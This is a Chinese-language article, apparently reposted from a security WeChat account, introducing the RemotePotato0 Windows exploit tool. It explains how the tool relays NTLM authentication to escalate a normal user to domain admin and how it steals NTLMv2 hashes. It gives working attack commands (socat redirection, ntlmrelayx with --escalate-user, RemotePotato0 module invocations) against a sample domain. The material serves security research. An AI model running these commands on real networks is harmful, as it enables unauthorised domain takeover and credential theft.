使用RemotePotato0从普通用户提升至域管理员

关于RemotePotato0

RemotePotato0是一款功能强大的Windows提权工具，本质上来说RemotePotato0是一个漏洞利用工具，可以帮助广大研究人员在Windows系统上，从一个普通用户提权至域管理员权限。

RemotePotato0可以利用DCOM激活服务，并触发针对当前登录到目标计算机的任何用户的NTLM身份验证。与此同时，该工具还需要在相同设备上已经有特权用户登录了（比如说，域管理员用户）。一旦触发NTLM type1，RemotePotato0将设置一个跨协议中继服务器，该服务器将负责接收特权type1消息，并通过解包RPC协议和HTTP打包身份验证，然后将其中继到第三个资源。在接收端，你可以设置另一个中继节点（如ntlmrelayx）或直接中继到特权资源。除此之外，RemotePotato0还允许抓取和窃取登录到目标设备上的每个用户的NTLMv2哈希。

源码获取

广大研究人员可以使用下列命令将该项目源码克隆至本地：

git clone https://github.com/antonioCoco/RemotePotato0.git

使用场景

• 攻击设备（10.0.0.20）

• 目标设备（10.0.0.45）

• 目标域控制器（10.0.0.10）

模块0 - Rpc2Http跨协议中继服务器 + potato触发器

sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.0.0.45:9999 &

sudo ntlmrelayx.py -t ldap://10.0.0.10 --no-wcf-server --escalate-user normal_user

注意：如果你操作的是Windows Server <= 2016，你可以避免使用网络重定向器（socat）：

query user

.RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1

模块1 - Rpc2Http跨协议中继服务器

.RemotePotato0.exe -m 1 -l 9997 -r 10.0.0.20

rp*cping -s 127.0.0.1 -e 9997 -a connect -u ntlm

模块2 - RPC捕捉（哈希）服务器

.RemotePotato0.exe -m 3 -l 9997

rp*cping -s 127.0.0.1 -e 9997 -a connect -u ntlm

工具使用

RemotePotato0

        @splinter_code & @decoder_it

 

 

 

Mandatory args:

-m module

        Allowed values:

        0 - Rpc2Http cross protocol relay server + potato trigger (default)

        1 - Rpc2Http cross protocol relay server

        2 - Rpc capture (hash) server + potato trigger

        3 - Rpc capture (hash) server

 

 

Other args: (someone could be mandatory and/or optional based on the module you use)

-r 远程HTTP中继服务器IP

-t 远程HTTP中继服务器端口 (默认为80)

-x 流氓Oxid解析器IP (默认为127.0.0.1)

-p 流氓Oxid解析器端口 (默认为9999)

-l RPC中继服务器监听端口 (默认为9997)

-s 跨会话激活攻击的目标会话IP (默认为disabled)

-c CLSID (默认为{5167B42F-C111-47A1-ACC4-8EABE61B0B54})

工具演示

跨会话激活：【GIF】

哈希窃取：【GIF】

项目地址

RemotePotato0：https://github.com/antonioCoco/RemotePotato0

本文始发于微信公众号（盾山实验室）：使用RemotePotato0从普通用户提升至域管理员